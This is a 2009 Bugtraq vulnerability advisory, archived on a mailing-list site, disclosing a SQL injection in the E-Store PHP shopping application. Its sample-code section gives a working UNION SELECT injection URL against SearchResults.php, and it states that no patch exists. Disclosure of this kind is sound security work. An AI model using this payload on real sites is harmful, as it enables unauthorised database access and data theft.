lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 11 Dec 2009 05:50:54 +0100
From: Salvatore Fresta aka Drosophila <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>
Subject: E-Store SQL Injection Vulnerability

E-Store SQL Injection Vulnerability

 Name              E-Store
 Vendor            http://www.getaphpsite.com

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-09-03

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

E-Store is a commercial PHP e-commerce.


II. DESCRIPTION

This application presents a SQL Injection bug.


III. ANALYSIS

Summary:

 A) SQL Injection

A) SQL Injection

The GET where parameter  passed to SearchResults.php has not
properly sanitised. Because of the affected query, the Magic
Quotes GPC flag (php.in) may be on.


IV. SAMPLE CODE

http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!


V. FIX

No patch.

Powered by blists - more mailing lists